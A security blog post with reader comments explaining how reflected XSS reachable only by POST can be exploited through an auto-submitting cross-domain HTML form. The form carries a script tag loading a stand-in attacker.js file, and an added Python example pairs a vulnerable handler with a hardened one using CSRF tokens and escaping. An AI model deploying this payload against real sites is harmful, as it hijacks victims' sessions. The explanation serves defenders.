Thursday, March 29, 2007

Exploiting XSS in POST requests

One good question I was asked in Amsterdam was whether it is possible to exploit a reflected cross-site scripting bug that can only be triggered via a POST request. The answer, of course, is "yes".

There are plenty of delivery mechanisms for reflected XSS attacks, only some of which involve inducing a victim to click on a crafted URL. For example, an attacker can create an innocuous-looking web page containing an HTML form with the required fields, and a script which auto-submits the form:

<form name=TheForm action=http://vuln-app/page.jsp method=post>
<input type=hidden name=foo value=&quot;&gt;&lt;script&#32;src=http://attacker/bad.js&gt;&lt;/script&gt;>
</form>
<script>document.TheForm.submit()</script>

Rather than creating his own web site, the attacker could of course inject the above attack into a third-party application via a stored XSS bug. The form is submitted cross-domain (as in a cross-site request forgery attack), but the resulting payload executes within the security context of the vulnerable application, enabling the full range of standard XSS attack actions to be performed.
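As an added example that is not part of the original post, the Python below (hypothetical handler names, constructed sample data) shows a handler that reflects a POSTed field verbatim beside a hardened version applying the two defences that matter for this delivery mechanism: a per-session anti-CSRF token, which a form auto-submitted from another domain cannot supply, and HTML encoding of the reflected value, which removes the XSS even when the request is genuine.

```python
import html
import hmac
import secrets

# Constructed in-memory session store for the example (hypothetical, not from the post).
SESSION_TOKENS = {}


def issue_token(session_id):
    """Mint a per-session anti-CSRF token and remember it server-side."""
    token = secrets.token_hex(16)
    SESSION_TOKENS[session_id] = token
    return token


def vulnerable_page(params):
    """Reflects the POSTed 'foo' field verbatim: the bug the post describes.
    A form auto-submitted cross-domain reaches this code like any other POST."""
    return "<p>You entered: %s</p>" % params.get("foo", "")


def hardened_page(session_id, params):
    """Two independent defences:
    1. reject any POST whose token does not match the victim's session, which
       blocks the cross-domain form delivery (the attacker's page cannot read it);
    2. HTML-encode the reflected value, which removes the XSS itself even when
       the request carries a valid token."""
    expected = SESSION_TOKENS.get(session_id)
    supplied = params.get("csrf_token", "")
    if expected is None or not hmac.compare_digest(expected, supplied):
        return "403 Forbidden: missing or invalid anti-CSRF token"
    return "<p>You entered: %s</p>" % html.escape(params.get("foo", ""), quote=True)


# Constructed sample: the decoded value the hidden field in the post above would carry.
PAYLOAD = '"><script src=http://attacker/bad.js></script>'


def demo():
    """Returns (vulnerable output, hardened output without token, hardened output with token)."""
    sid = "victim-session"
    token = issue_token(sid)
    cross_domain_post = {"foo": PAYLOAD}                 # auto-submitted form: no token
    legit_post = {"foo": PAYLOAD, "csrf_token": token}   # same-origin form: token present
    return (vulnerable_page(cross_domain_post),
            hardened_page(sid, cross_domain_post),
            hardened_page(sid, legit_post))
```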


Anonymous said...

Thanks a lot.
It helped me to prepare a PoC for one of my personal projects.

Keep up the good work!!!

Anonymous said...

This should not be exploitable if the site has CSRF protection.

Anonymous said...

If the CSRF token is publicly available (such as on a registration page) then it is still vulnerable, as a token can be pulled with JS. Unless they tie tokens to IP.

Anonymous said...

Sorry, newbie asking a question..

So to do an XSS attack with the POST method, do we act as a proxy (man-in-the-middle) to tamper with the POST request sent to the user/client and inject the code there? Or how? Please explain.

Dafydd Stuttard said...

@Anonymous No, an active MITM attack doesn't need to exploit XSS since you can just directly manipulate responses. To exploit XSS via a POST request you use a form with a cross-domain action URL, as described in this blog post.